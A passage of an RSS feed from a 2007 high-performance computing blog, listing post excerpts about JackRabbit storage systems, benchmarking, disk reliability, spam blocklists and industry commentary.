      <link>https://blog.scalability.org/2007/05/accelerated-computing-appliances/</link>
      <pubDate>Tue, 01 May 2007 12:31:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/accelerated-computing-appliances/</guid>
      <description>Having spoken with quite a number of potential/current customers on this topic, we had been assured that end users were largely disinterested in expensive single point-function computing devices. They wanted inexpensive, and fast, and reusable for other things. 10x current platform performance for well under 10k$US was what really stuck out in our responses to inquiries.
Of course, this was over the last several years, and you get 10x from Moore&amp;rsquo;s law advances every 5-6 years, so you can always just wait.</description>
    </item>
    
    <item>
      <title>Looking for needles in haystacks, and other quixotic pasttimes</title>
      <link>https://blog.scalability.org/2007/04/looking-for-needles-in-haystacks-and-other-quixotic-pasttimes/</link>
      <pubDate>Fri, 27 Apr 2007 16:57:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/looking-for-needles-in-haystacks-and-other-quixotic-pasttimes/</guid>
      <description>I have been wanting to get CCS adoption data. It helps us understand whether this is a viable target for software development, and whether or not we want to invest limited resources in it. We had been asked previously by Microsoft to &amp;ldquo;benchmark&amp;rdquo; applications, though they seem to have missed our point about porting the applications to run fast natively before we benchmark.
Regardless, we want to see if others have been adopting the platform.</description>
    </item>
    
    <item>
      <title>Spring special for the 24 TB JackRabbit</title>
      <link>https://blog.scalability.org/2007/04/spring-special-for-the-24-tb-jackrabbit/</link>
      <pubDate>Thu, 26 Apr 2007 04:33:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/spring-special-for-the-24-tb-jackrabbit/</guid>
      <description>Spring is almost here &amp;hellip; in Michigan. Its not cold enough to snow, but not warm enough for trees and plants to bloom. That means that it is time for rabbits to go forth and multiply. With this in mind, in honor of the new product offering, Scalable Informatics JackRabbit 24 TB storage systems are available from Scalable Informatics and partners for $23,830. This is less than $1/GB for a system demonstrating more than 1 GB/s performance on standard IO test cases.</description>
    </item>
    
    <item>
      <title>JackRabbit benchmark report is up</title>
      <link>https://blog.scalability.org/2007/04/jackrabbit-benchmark-report-is-up/</link>
      <pubDate>Wed, 18 Apr 2007 13:27:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/jackrabbit-benchmark-report-is-up/</guid>
      <description>Have a look here. Performance is excellent.
[ ](http://scalability.org/images/JR-benchmark-picture.jpg)</description>
    </item>
    
    <item>
      <title>High Performance Computing Acceleration White Paper</title>
      <link>https://blog.scalability.org/2007/04/high-performance-computing-acceleration-white-paper/</link>
      <pubDate>Mon, 09 Apr 2007 23:36:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/high-performance-computing-acceleration-white-paper/</guid>
      <description>We worked on this white paper back at the end of December for AMD. We have significant data that goes along with it, very interesting data, that shows nicely that software and software+hardware accelerated applications can scale. The white paper is here or you can pull it from the AMD site.
[ ](http://www.scalableinformatics.com/public/AccComp_WP.pdf)
There are a few editing mistakes in it, but apart from that, it is an overview of acceleration as it exists today.</description>
    </item>
    
    <item>
      <title>The importance of scaling down (as well as up)</title>
      <link>https://blog.scalability.org/2007/04/the-importance-of-scaling-down-as-well-as-up/</link>
      <pubDate>Sat, 07 Apr 2007 04:13:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/the-importance-of-scaling-down-as-well-as-up/</guid>
      <description>We had some conversations recently with customers about JackRabbit solutions that suggested what we thought as our small configuration was in fact too large. This was an eye-opener.
This group has particular needs well suited to the design, but they have to keep the system costs down, and are willing to trade some aspects of design for cost. So we worked on it, and came out with a unit that should be able to provide about 8 TB for about 9k$ US.</description>
    </item>
    
    <item>
      <title>As systems scale up, hard problems are exposed</title>
      <link>https://blog.scalability.org/2007/04/as-systems-scale-up-hard-problems-are-exposed/</link>
      <pubDate>Sat, 07 Apr 2007 04:05:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/as-systems-scale-up-hard-problems-are-exposed/</guid>
      <description>You have a 4 node cluster. You want to share data among the nodes. Pretend it is a &amp;ldquo;desktop&amp;rdquo; machine. Fine. Setup NFS. Or Samba/CIFS. Share the data. End of story. But this doesn&amp;rsquo;t work as well when you get to 40 nodes, and starts failing badly at 400. At 4000 nodes, well, you need a special filesystem design. What happened? Why when we scale up do problems arise?
Well, you have several factors.</description>
    </item>
    
    <item>
      <title>Added a view counter and other blogging bits</title>
      <link>https://blog.scalability.org/2007/04/added-a-view-counter-and-other-blogging-bits/</link>
      <pubDate>Mon, 02 Apr 2007 18:47:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/04/added-a-view-counter-and-other-blogging-bits/</guid>
      <description>Won&amp;rsquo;t grab historical data, just stuff going forward &amp;hellip;</description>
    </item>
    
    <item>
      <title>Some see an augering in, some see opportunity</title>
      <link>https://blog.scalability.org/2007/03/some-see-an-augering-in-some-see-opportunity/</link>
      <pubDate>Fri, 30 Mar 2007 02:28:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/some-see-an-augering-in-some-see-opportunity/</guid>
      <description>My day job is at a company in the Metro Detroit area. Metro Detroit, and actually Michigan in general is a very nice state. This is a good place. There are good people here. Prices are reasonable, cost of living isn&amp;rsquo;t terrible, and for the moment, taxes are under control.
The problem is that the area is completely dependent upon the fortunes of the US auto manufacturers. Since manufacturing continues its effort to seek out and use the lowest cost systems, Metro Detroit and Michigan will continue to hemorrhage jobs in this area.</description>
    </item>
    
    <item>
      <title>Looks nice, but I still worry about memory contention</title>
      <link>https://blog.scalability.org/2007/03/looks-nice-but-i-still-worry-about-memory-contention/</link>
      <pubDate>Fri, 30 Mar 2007 01:05:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/looks-nice-but-i-still-worry-about-memory-contention/</guid>
      <description>Intel announced some details on Penryn and others today. It looks like a sweet chip. The problem I am having is, if the Clovertown is memory bus bound with 4 cores (2 x 2-core chips) for a number of memory intensive workloads, won&amp;rsquo;t 8+ cores be worse? Think of this in terms of public expenditure and return on investment. If something you are investing more money in isn&amp;rsquo;t giving you the return you want/need, doesn&amp;rsquo;t it make sense to stop throwing more money at it?</description>
    </item>
    
    <item>
      <title>PeakStream Announces Availability of PeakStream Workstation for Microsoft Windows(R) Edition beta</title>
      <link>https://blog.scalability.org/2007/03/peakstream-announces-availability-of-peakstream-workstation-for-microsoft-windowsr-edition-beta/</link>
      <pubDate>Tue, 27 Mar 2007 18:22:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/peakstream-announces-availability-of-peakstream-workstation-for-microsoft-windowsr-edition-beta/</guid>
      <description>REDWOOD CITY, Calif.-(Business Wire)-March 27, 2007 - PeakStream, Inc., a leading software application platform provider for the high performance computing (HPC) market, today announced its innovative PeakStream Platform(TM) is now available in beta version for Microsoft Windows.PeakStream Workstation(TM) for Microsoft Windows(R) Edition allows software developers to easily program new high performance processors such as multi-core CPUs and graphics processor units (GPUs) directly on their desktops. Now, programmers working with Windows can enjoy the same advantages that their Linux-based counterparts have been benefiting from since the PeakStream Platform&amp;rsquo;s initial launch last September: the ability to develop technical and scientific applications faster, and run them at higher performance, using their existing tools and programming languages.</description>
    </item>
    
    <item>
      <title>Final sprint before shipping</title>
      <link>https://blog.scalability.org/2007/03/final-sprint-before-shipping/</link>
      <pubDate>Mon, 26 Mar 2007 20:00:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/final-sprint-before-shipping/</guid>
      <description>Now that I (think) understand most of the major issues here, and I can be reasonably sure that I have a good grasp of the tuning, I think I want to take it out on the test track and give it one final once over. Lets open the throttle. Wide.
I can tune the IO scheduler, number of outstanding IO requests (for sorting), various buffer cache, and the works. I now have the clock left alone (need to set it that way by default), so it is running full speed.</description>
    </item>
    
    <item>
      <title>powernow considered harmful (to benchmarking)</title>
      <link>https://blog.scalability.org/2007/03/powernow-considered-harmful-to-benchmarking/</link>
      <pubDate>Mon, 26 Mar 2007 14:29:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/powernow-considered-harmful-to-benchmarking/</guid>
      <description>I had an interesting epiphany over the last few days. We normally turn on powernow to let idle machines &amp;hellip; idle &amp;hellip; during low load times. This way they consume less power.
Of course, the road to penultimate benchmark results is paved with such good intentions. I noticed that when run this way, several CPU/memory/IO benchmarks didn&amp;rsquo;t always hit the throttle on the CPU. It remained clocked lower. Which meant I was getting very odd buffer cache timings that I could not quite grok.</description>
    </item>
    
    <item>
      <title>WinCE-ing</title>
      <link>https://blog.scalability.org/2007/03/wince-ing/</link>
      <pubDate>Sun, 25 Mar 2007 03:50:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/wince-ing/</guid>
      <description>So I have a &amp;ldquo;new&amp;rdquo; phone. Long story, not worth going into. It runs Windows CE. My Palm Treo 650 was frustrating (PalmOS is inconsistent, and largely broken, missing important things &amp;hellip; and it crashed &amp;hellip; occasionally wiping out the email program and all settings). If anyone from Palm is reading this, please understand that I have every intention of avoiding your future products. For a very good reason. This phone looked better than mine from a feature perspective.</description>
    </item>
    
    <item>
      <title>Linux advertisement from Novell</title>
      <link>https://blog.scalability.org/2007/03/linux-advertisment-from-novell/</link>
      <pubDate>Sat, 24 Mar 2007 14:50:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/linux-advertisment-from-novell/</guid>
      <description>Amusing&amp;hellip; Of course there is more than a little grain of truth to it, even though it is marketing. And there is a second &amp;ldquo;ad&amp;rdquo; here, and a third. Update: Ok, this is something I don&amp;rsquo;t quite get. I have done some searching for market share data for Linux. Why not, it is of some interest to know what customers want and are interested in using. Almost all the &amp;ldquo;data&amp;rdquo; I have seen puts Linux penetration into the noise.</description>
    </item>
    
    <item>
      <title>New JackRabbit site is up</title>
      <link>https://blog.scalability.org/2007/03/new-jackrabbit-site-is-up/</link>
      <pubDate>Wed, 21 Mar 2007 12:50:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/new-jackrabbit-site-is-up/</guid>
      <description>Finally, hunkered down, did a less is more approach. See http://jackrabbit.scalableinformatics.com. Or this link. Getting content up there in bits and pieces. Working on the most requested bits, the updated benchmark reports. Update: As I have discovered, some people are ideologically opposed to telling us who they are before they read the papers. Fair enough. Will give them incentives. Go to the links, pull them down, and if you like them and possibly buy them from Scalable (or our partners) we will provide a discount if your correct name/email/phone data is in the database.</description>
    </item>
    
    <item>
      <title>This is wrong, so very wrong</title>
      <link>https://blog.scalability.org/2007/03/this-is-wrong-so-very-wrong/</link>
      <pubDate>Wed, 21 Mar 2007 12:44:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/this-is-wrong-so-very-wrong/</guid>
      <description>When you update your computer, get patches, you assume (and this may be the hard part) that the people putting out the patches respect your efforts to keep your system secure. Of course, some like checking every few weeks if your system is &amp;ldquo;genuine&amp;rdquo;. You know that they would never, ever waste your time and effort on pushing a marketing program as a patch. Never. Ever.

Because it would be wrong.</description>
    </item>
    
    <item>
      <title>Paid my Microsoft tax today ...</title>
      <link>https://blog.scalability.org/2007/03/paid-my-microsoft-tax-today/</link>
      <pubDate>Sun, 18 Mar 2007 22:50:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/paid-my-microsoft-tax-today/</guid>
      <description>Yes, for a number of reasons, we needed to get another laptop (good reasons, we are growing, and our new person needs it).
Unfortunately, it is pretty close to impossible to find a laptop without Vista. I would prefer XP Pro out of all the Microsoft products. It does appear that HP will be offering laptops with SuSE on them, and hopefully Dell will be offering them with Ubuntu and others.</description>
    </item>
    
    <item>
      <title>The 3-day IOzone test ...</title>
      <link>https://blog.scalability.org/2007/03/the-3-day-iozone-test/</link>
      <pubDate>Sat, 17 Mar 2007 02:52:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/the-3-day-iozone-test/</guid>
      <description>Ugh &amp;hellip; I had thought that I would be able to use VC++ to build IOzone. Well, I haven&amp;rsquo;t been successful at this. IOzone, like many other OSS codes, uses autoconf. Which hasn&amp;rsquo;t been ported to enable people to use VC++.
So I used Cygwin to build bonnie++ and IOzone. IOzone has been running, oh, about 3 days now, on the Windows 2003 Server x64 unit. With a 32GB file size, performance pretty much falls off the radar.</description>
    </item>
    
    <item>
      <title>Someone needs to take charge at Novell</title>
      <link>https://blog.scalability.org/2007/03/someone-needs-to-take-charge-at-novell/</link>
      <pubDate>Thu, 15 Mar 2007 23:05:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/someone-needs-to-take-charge-at-novell/</guid>
      <description>[shakes head in disbelief] Reported on /. and elsewhere. Way back when it was announced, Mr. Ballmer, head honcho of Microsoft, demonstrated how much he p0wned Novell when he let loose with some beauties right after signing a deal with them.
Our comment at the time was
And today, we get a demonstration of how badly they were played, and continue to be played, and how clueless their marketing is. From /.</description>
    </item>
    
    <item>
      <title>RedHat EL 5 is out</title>
      <link>https://blog.scalability.org/2007/03/redhat-el-5-is-out/</link>
      <pubDate>Thu, 15 Mar 2007 19:22:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/redhat-el-5-is-out/</guid>
      <description>Old news by now. Looks like, apart from xfs, they fixed lots of things they needed to fix. They made the advanced version look very nice. With this, setting up JackRabbit Pack storage clusters should be pretty easy. We will still have to support xfs externally to them, but at least now they have some things we can use within our RAIN JackRabbit Pack storage cluster. Time to make sure it works.</description>
    </item>
    
    <item>
      <title>JackRabbits looking through Windows ...</title>
      <link>https://blog.scalability.org/2007/03/jackrabbits-looking-through-windows/</link>
      <pubDate>Thu, 15 Mar 2007 02:07:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/jackrabbits-looking-through-windows/</guid>
      <description>Summary: JackRabbit officially supports Windows 2003 Server x64. Scalable Informatics will support JackRabbits running windows. For those not in the know, JackRabbit is a very dense, power efficient, and high performance storage system. 36 TB (yes TeraByte) raw in 5 rack units (yes, this is not a typo). We regularly measure more than 1GB/s sustained to disks. It has network pipes to push out the data as well, starting with quad Gigabit ethernet, and moving up from there to Infiniband, 10GbE, and other technologies as they stabilize.</description>
    </item>
    
    <item>
      <title>Like deja vu all over again ...</title>
      <link>https://blog.scalability.org/2007/03/like-deja-vu-all-over-again/</link>
      <pubDate>Wed, 14 Mar 2007 13:40:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/like-deja-vu-all-over-again/</guid>
      <description>When I installed the original Solaris 10 bits (the 6.06 bits) on a machine, I was amazed at how incredibly confused and useless the installer was. For a supposedly powerful OS to have so completely useless an installer didn&amp;rsquo;t amuse me; it frustrated me. Keep this in mind. I am installing, or, put more accurately, attempting to install, Windows 2003 x64 server.
Boots from the DVD/CD on the USB2 port. So far so good.</description>
    </item>
    
    <item>
      <title>More fast rabbits ...</title>
      <link>https://blog.scalability.org/2007/03/more-fast-rabbits/</link>
      <pubDate>Wed, 14 Mar 2007 00:27:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/more-fast-rabbits/</guid>
      <description>The rebuild finished. Rebooted, not sure why we were getting the oddities we did. On the test track. Open it up, just a little.
As I am sitting here, I am watching it spill 500-700 MB/s to disk in writes. Our test case is 2x larger than physical memory. Caching isn&amp;rsquo;t relevant for reading and writing here. Now it is switching into &amp;ldquo;Reading intelligently&amp;hellip;&amp;rdquo;. To understand why this is so interesting, here is some dstat output again.</description>
    </item>
    
    <item>
      <title>JackRabbits are fast critters</title>
      <link>https://blog.scalability.org/2007/03/jackrabbits-are-fast-critters/</link>
      <pubDate>Tue, 13 Mar 2007 04:40:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/jackrabbits-are-fast-critters/</guid>
      <description>We received our unit back from the testers. We were interested in seeing them run the unit hard and comparing it to others in similar configs. Sadly this is not what happened. Regardless, we decided to take the unit out, play with it, understand the performance little better, then take it out to the test track and crack the throttle wide open. Let it run flat out for a bit. See what it can do.</description>
    </item>
    
    <item>
      <title>Yet Another Broken RBL</title>
      <link>https://blog.scalability.org/2007/03/yet-another-broken-rbl-2/</link>
      <pubDate>Mon, 12 Mar 2007 15:05:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/yet-another-broken-rbl-2/</guid>
      <description>With the latest spam surge in progress, admins seem hell-bent on using non-functional methods to fight this. So our legitimate mails get blocked, since we are on particular ISPs. This is nuts.
Ok, I am going to lay into the RBLs here. Unless you have evidence that our IPs have been spamming, you should not try to stop mail. Evidence of spamming is, curiously enough, spam traced back to our IP addresses.</description>
    </item>
    
    <item>
      <title>quick update to 2.1.2 WP</title>
      <link>https://blog.scalability.org/2007/03/quick-update-to-212-wp/</link>
      <pubDate>Sun, 04 Mar 2007 16:16:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/03/quick-update-to-212-wp/</guid>
      <description>No news is good news. No issues, just precautions. This does bring up the issue of security. PHP appears to be quite exploitable. Sure, code in any language can usually be made to do unexpected things if fed unanticipated input, and the input is not correctly scrubbed.
Just as a precaution, it looks like running PHP based sites ought to be done in virtual machines without write access to local storage.</description>
    </item>
    
    <item>
      <title>And the beat goes on ...</title>
      <link>https://blog.scalability.org/2007/02/and-the-beat-goes-on/</link>
      <pubDate>Thu, 01 Mar 2007 02:57:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/and-the-beat-goes-on/</guid>
      <description>Netapp makes good points in their response to the paper on average failure rates. Ignoring the intrinsic marketing in their document, the information in there is invaluable. As indicated before, PT Barnum would be pleased with the vendors of the higher priced product promising, but not delivering, higher reliability.
We had noticed this for a while: failure rates are about the same. And in this case, why would you use the more expensive product which promises lower failure rates?</description>
    </item>
    
    <item>
      <title>When you have a great deal of power, but you can&#39;t use it, because it is too hard to use it ...</title>
      <link>https://blog.scalability.org/2007/02/when-you-have-a-great-deal-of-power-but-you-cant-use-it-because-it-is-too-hard-to-use-it/</link>
      <pubDate>Sun, 25 Feb 2007 13:43:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/when-you-have-a-great-deal-of-power-but-you-cant-use-it-because-it-is-too-hard-to-use-it/</guid>
      <description>For decades, I have been debating friends and colleagues talking about high performance computing, specifically parallel computing. They doubt that parallel computing techniques will ever go &amp;ldquo;mainstream&amp;rdquo;. That is, that there will ever be a large upswing in the number of users of parallel programming techniques and methods, or for that matter codes which use parallel programming effectively. I argue that this will occur, when such usage gets to be &amp;ldquo;easy&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>FWIW</title>
      <link>https://blog.scalability.org/2007/02/fwiw/</link>
      <pubDate>Sun, 25 Feb 2007 02:06:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/fwiw/</guid>
      <description>We have been asked to do some benchmarking of CCS systems using a number of codes. I wanted us to do better ports of the codes, so that they get at least performance parity with Linux. There is lots of FUD emanating from the groups about superiority in one aspect or another, and we want to ignore that, fix the bottlenecks, and get good performance on Windows.
The last time we dealt with something like this was with Solaris 10 (and to a lesser extent, OSX before that).</description>
    </item>
    
    <item>
      <title>Yuppers</title>
      <link>https://blog.scalability.org/2007/02/yuppers/</link>
      <pubDate>Sun, 25 Feb 2007 01:32:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/yuppers/</guid>
      <description>Saw this on /.. I heartily agree with the premise. The idea is put up, or, well &amp;hellip; ya know &amp;hellip;
Unfortunately, Microsoft is quite likely to ignore this. Give it no notice. Which is a shame. If they have a claim worth litigating, it is likely that they would be asked if they tried other remedies first, such as asking to have the offending code removed. Here you have a large group of people basically saying &amp;ldquo;where&amp;rsquo;s the beef &amp;hellip; er &amp;hellip; code&amp;rdquo;?</description>
    </item>
    
    <item>
      <title>Eloquent statement</title>
      <link>https://blog.scalability.org/2007/02/eloquent-statement/</link>
      <pubDate>Sat, 24 Feb 2007 02:47:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/eloquent-statement/</guid>
      <description>From today&amp;rsquo;s HPCWire.
What Professor Snir said for programming HPC also holds true for designing HPC systems and clusters. Anyone can take a group of machines and &amp;ldquo;turn them into a cluster&amp;rdquo;. Heck, you can even ask your local, neighborhood MCSE to do it for you. And it may work well for some set of problems. But what happens when performance goes into the dirt on a critical code, and you don&amp;rsquo;t understand why?</description>
    </item>
    
    <item>
      <title>Sun, utility computing for HPC, and changes</title>
      <link>https://blog.scalability.org/2007/02/sun-utility-computing-for-hpc-and-changes/</link>
      <pubDate>Fri, 23 Feb 2007 20:41:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/sun-utility-computing-for-hpc-and-changes/</guid>
      <description>About a year ago, we were exploring working with Sun to resell CPU cycles with application frontend units. We were going to run Linux on their machines.
Seems Sun no longer is doing this. A customer asked us to provide dedicated cycles to them, for their app. Sun doesn&amp;rsquo;t seem to enable this anymore. Moreover, their entire &amp;ldquo;utility computing&amp;rdquo; model is based upon non-dedicated Solaris 10. This is unfortunately a non-starter.</description>
    </item>
    
    <item>
      <title>This is at least amusing ...</title>
      <link>https://blog.scalability.org/2007/02/this-is-at-least-amusing/</link>
      <pubDate>Wed, 21 Feb 2007 13:18:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/this-is-at-least-amusing/</guid>
      <description>So we had the little &amp;hellip; I dunno what to call it &amp;hellip; fiasco, mebbe? where we were promised a reasonable comparison between a JackRabbit and a Thumper, and did not get it (a reasonable out-of-box comparison, no one I know who promises accurate comparison purposefully de-tunes one platform before comparing). I am not going to dive back into that mess. When we are paid to benchmark, or when we do it on our own, we never, ever start out by ignoring the vendor/authors on what makes it slow/fast.</description>
    </item>
    
    <item>
      <title>Well I&#39;ll be darned ...</title>
      <link>https://blog.scalability.org/2007/02/well-ill-be-darned/</link>
      <pubDate>Wed, 21 Feb 2007 03:04:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/well-ill-be-darned/</guid>
      <description>More people are picking up the drive story. I expect to hear rebuttals any time now from the big expensive disk players.
FWIW: we have been talking about this for a while. Lots of our partners have observed these things. MTBF is a great way to estimate things. The model appears to be broken, as it is not 5-20% off. But 5-10x off. This is important. If you develop a theory, and it mispredicts something by a significant amount, you have, really, one option for your theory.</description>
    </item>
    
    <item>
      <title>That banging sound you hear is my head against the table</title>
      <link>https://blog.scalability.org/2007/02/that-banging-sound-you-hear-is-my-head-against-the-table/</link>
      <pubDate>Wed, 21 Feb 2007 00:46:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/that-banging-sound-you-hear-is-my-head-against-the-table/</guid>
      <description>Names not mentioned to protect the guilty. So I am working on a cluster load. Have everything nicely configured. Do some tests, make sure it takes correctly. I have spent many an hour dealing with some sort of broken process, due to minor changes in seemingly unrelated areas. Usually broken due to badly borked installers that, for better or worse (usually worse), are considered &amp;ldquo;standard.&amp;rdquo;
This is the N+1th test. We have customers who like installing and re-installing.</description>
    </item>
    
    <item>
      <title>Disk reliability: FC and SCSI vs SATA</title>
      <link>https://blog.scalability.org/2007/02/disk-reliability-fc-and-scsi-vs-sata/</link>
      <pubDate>Sat, 17 Feb 2007 00:59:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/disk-reliability-fc-and-scsi-vs-sata/</guid>
      <description>I have been pointing out for some time that disk manufacturing processes and hardware are pretty much identical across all types of disk. There is nothing of significance different between the hardware in a SCSI, FC, or SATA drive, outside the drive electronics package.
One of the side effects of this would be effectively indistinguishable failure rates between the hardware. Of course, all these vendors publish MTBF, and other numbers which are &amp;ldquo;measured&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Benchmarking a JackRabbit</title>
      <link>https://blog.scalability.org/2007/02/benchmarking-a-jackrabbit/</link>
      <pubDate>Tue, 13 Feb 2007 15:58:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/benchmarking-a-jackrabbit/</guid>
      <description>This is a modified version of a previous posting. We agreed to rewrite this post, eliding mention of a report we had taken issue with, and why we had taken issue with it. We will report JackRabbit benchmark data as we have measured it on our original system. Updated benchmark data, run files, and so on will be available from our site as soon as possible.
IOzone benchmarks were run and the results plotted.</description>
    </item>
    
    <item>
      <title>Get yer cores here, fresh hot, 80 of them ...</title>
      <link>https://blog.scalability.org/2007/02/get-yer-cores-here-fresh-hot-80-of-them/</link>
      <pubDate>Mon, 12 Feb 2007 18:18:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/get-yer-cores-here-fresh-hot-80-of-them/</guid>
      <description>Only 1.2TF performance. Ok, I am officially impressed. The immediate questions are
a) can anyone actually program it? b) how hard do you have to work to feed this monster? Data motion is hard. Very hard. You have fixed sized pipes. You see contention at dual core, and quad, as Clovertown shows, is not appropriate for memory bound codes on fixed/limited width memory pipes. Regardless of those (not so minor) issues, all I can say is &amp;ldquo;wow&amp;rdquo; and good job Intel.</description>
    </item>
    
    <item>
      <title>Linux and Microsoft:  Jeremy Allison&#39;s summary of the Novell deal</title>
      <link>https://blog.scalability.org/2007/02/linux-and-microsoft-jeremy-allisons-summary-of-the-novell-deal/</link>
      <pubDate>Sun, 11 Feb 2007 18:11:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/linux-and-microsoft-jeremy-allisons-summary-of-the-novell-deal/</guid>
      <description>Saw this on /.. Jeremy&amp;rsquo;s major problem was the patent cross license.
My problem was not that. I had indicated that if this were a reasonable deal, then both companies would be talking about expanded capabilities, better interop, and all sorts of things. One company was talking that way. Novell. One company was talking about &amp;ldquo;unaccounted for balance sheet liabilities&amp;rdquo;. Also known as FUD. Specifically he articulated:
Yeah&amp;hellip; he noticed that too.</description>
    </item>
    
    <item>
      <title>The grid is dead ... long live the ... er ... grid</title>
      <link>https://blog.scalability.org/2007/02/the-grid-is-dead-long-live-the-er-grid/</link>
      <pubDate>Sat, 10 Feb 2007 17:04:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/the-grid-is-dead-long-live-the-er-grid/</guid>
      <description>I saw a post linked from Ken Farmer&amp;rsquo;s excellent LinuxHPC.org site. In it the author leads with a title of &amp;ldquo;Grid computing being doomed.&amp;rdquo;
Ok &amp;hellip; Reading further, it seems that the conception of what Grid computing is has morphed a bit. With the rise of the SaaS fad (long term fad, unless it can show real demonstrable ROI for everyday apps) and VCs pouring money into this willy-nilly, it turns out that &amp;ldquo;Grid&amp;rdquo; is no longer fashionable for VCs.</description>
    </item>
    
    <item>
      <title>P=NP and other trivia</title>
      <link>https://blog.scalability.org/2007/02/pnp-and-other-trivia/</link>
      <pubDate>Thu, 08 Feb 2007 20:46:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/pnp-and-other-trivia/</guid>
      <description>Ok, well, not quite. But apparently the folks over at D-Wave have a quantum computer about to be shown solving a real problem. Talk about accelerated computing &amp;hellip;
They are somewhat flippant about pointing out that this is an NP problem solver. So if we have some little NP problem, like, I dunno, Ising models in the presence of a magnetic field, this thing ought to be able to solve it.</description>
    </item>
    
    <item>
      <title>Yet another broken RBL</title>
      <link>https://blog.scalability.org/2007/02/yet-another-broken-rbl/</link>
      <pubDate>Mon, 05 Feb 2007 18:57:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/yet-another-broken-rbl/</guid>
      <description>Yup, as if it should surprise anyone. PBL from Spamhaus.org. Somehow they decided that our mail system is not allowed to send mail.
I have grown tired of this. 3 weeks ago we defended against a huge DDoS without using a single RBL. In fact, had we used an RBL, the traffic against that server (they use DNS-like records) would have been assumed to be a DDoS on our part against them.</description>
    </item>
    
    <item>
      <title>Post 202 transmogrified to post 209</title>
      <link>https://blog.scalability.org/2007/02/post-202-transmogrified-to-post-209/</link>
      <pubDate>Sat, 03 Feb 2007 05:00:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/post-202-transmogrified-to-post-209/</guid>
      <description>post removed, content edited, and put at http://www.scalability.org?p=209 . For information on JackRabbit, see http://jackrabbit.scalableinformatics.com .</description>
    </item>
    
    <item>
      <title>Business planning</title>
      <link>https://blog.scalability.org/2007/02/business-planning/</link>
      <pubDate>Fri, 02 Feb 2007 21:38:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/business-planning/</guid>
      <description>Deepak over at MNDoci links to Guy Kawasaki&amp;rsquo;s blog. I browsed through it and found this post. Basically it questions whether or not a formally constructed business plan is needed.
Ok, this is an oversimplification. The basic idea is that you need to be able to communicate your ideas concisely, to be able to convince others that the ideas have merit, and that you have more than a snowball&amp;rsquo;s chance on a sunny July afternoon in Florida of actually making it work.</description>
    </item>
    
    <item>
      <title>Demoing Accelerated Computing</title>
      <link>https://blog.scalability.org/2007/02/demoing-accelerated-computing/</link>
      <pubDate>Fri, 02 Feb 2007 21:09:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/demoing-accelerated-computing/</guid>
      <description>So I flew to Eilat, demonstrated how a little accelerated computing worked relative to a cluster. What really got to me was how simple a demo it was. The fingers never left the hands, and all that.
We ran a HMMer run on the cluster, then a Scalable HMMer run on the identical data set. Then we ran an 8 way cluster run using MPI-HMMer, again, running the same data and options.</description>
    </item>
    
    <item>
      <title>Jim Gray</title>
      <link>https://blog.scalability.org/2007/02/jim-gray/</link>
      <pubDate>Fri, 02 Feb 2007 03:59:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/02/jim-gray/</guid>
      <description>Fox News is reporting him missing at sea. He was sailing on the west coast, in the SF Bay area. I hope for the best, though things are not looking good.
Jim Gray is one of those few scientists who is a universalist: he has made contributions across a broad spectrum of research. Many scientists pick one sub-field, and hyper-specialize in that, creating esoterica with abandon. Dr. Gray&amp;rsquo;s contributions are broad-based and deep; he appears able to work comfortably in many fields with many researchers.</description>
    </item>
    
    <item>
      <title>Inversion</title>
      <link>https://blog.scalability.org/2007/01/inversion/</link>
      <pubDate>Tue, 30 Jan 2007 06:53:05 +0000</pubDate>
      
